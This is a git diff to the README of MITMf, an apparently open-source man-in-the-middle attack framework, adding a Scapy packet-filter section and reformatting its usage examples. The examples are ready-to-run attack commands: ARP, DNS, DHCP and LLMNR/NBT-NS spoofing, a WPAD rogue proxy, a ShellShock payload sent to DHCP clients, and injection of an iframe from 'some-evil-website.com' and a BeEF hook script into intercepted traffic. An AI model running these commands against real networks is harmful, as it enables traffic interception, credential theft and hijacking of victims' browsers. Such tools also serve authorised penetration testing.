diff --git a/README.md b/README.md index a9b8a7c..6ff6741 100644 --- a/README.md +++ b/README.md @@ -16,7 +16,7 @@ Contact me at: - IRC on Freenode: #MITMf - Email: byt3bl33d3r@gmail.com -**Before submitting issues, please read the [FAQ](#faq) and [CONTRIBUTING.md](CONTRIBUTING.md).** +**Before submitting issues, please read the [CONTRIBUTING.md](CONTRIBUTING.md).** Description ============ @@ -40,46 +40,67 @@ allowing users to modify any type of traffic or protocol. - [Responder](https://github.com/SpiderLabs/Responder) integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support. +Active packet filtering/modification +==================================== + +You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!) + +For example, here's a stupid little filter that just changes the destination IP address of ICMP packets: + +``` +if packet.haslayer(ICMP): + packet.dst = '192.168.1.0' + +``` +- Use the ```packet``` variable to access the packet in a Scapy compatible format +- Use the ```data``` variable to access the raw packet data + +Now to use the filter all we need to do is: ```python mitmf.py -F ~/filter.py``` + +You will probably want to combine that with the **Spoof** plugin to actually intercept packets from someone else ;) + Examples ======== The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0: -- ```python mitmf.py -i enp3s0``` +```python mitmf.py -i enp3s0``` ARP poison 192.168.1.0/24 with the gateway at 192.168.1.1 using the **Spoof** plugin: -- ```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.1.0/24 --gateway 192.168.1.1``` +```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.1.0/24 --gateway 192.168.1.1``` Same as above + a WPAD rogue proxy server using the **Responder** plugin: -- ```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.0.0/24 --gateway 192.168.1.1 --responder --wpad``` +```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.0.0/24 --gateway 192.168.1.1 --responder --wpad``` Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file): -- ```python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1``` +```python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1``` Enable LLMNR/NBTNS/MDNS spoofing: -- ```python mitmf.py -i enp3s0 --responder --wredir --nbtns``` +```python mitmf.py -i enp3s0 --responder --wredir --nbtns``` Enable DHCP spoofing (the ip pool and subnet are pulled from the config file): -- ```python mitmf.py -i enp3s0 --spoof --dhcp``` +```python mitmf.py -i enp3s0 --spoof --dhcp``` Same as above with a ShellShock payload that will be executed if any client is vulnerable: -- ```python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'``` +```python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'``` Inject an HTML IFrame using the **Inject** plugin: -- ```python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com``` +```python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com``` Inject a JS script: -- ```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js``` +```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js``` -And much much more! Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..) +And much much more! + +Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..) For a complete list of available options, just run ```python mitmf.py --help```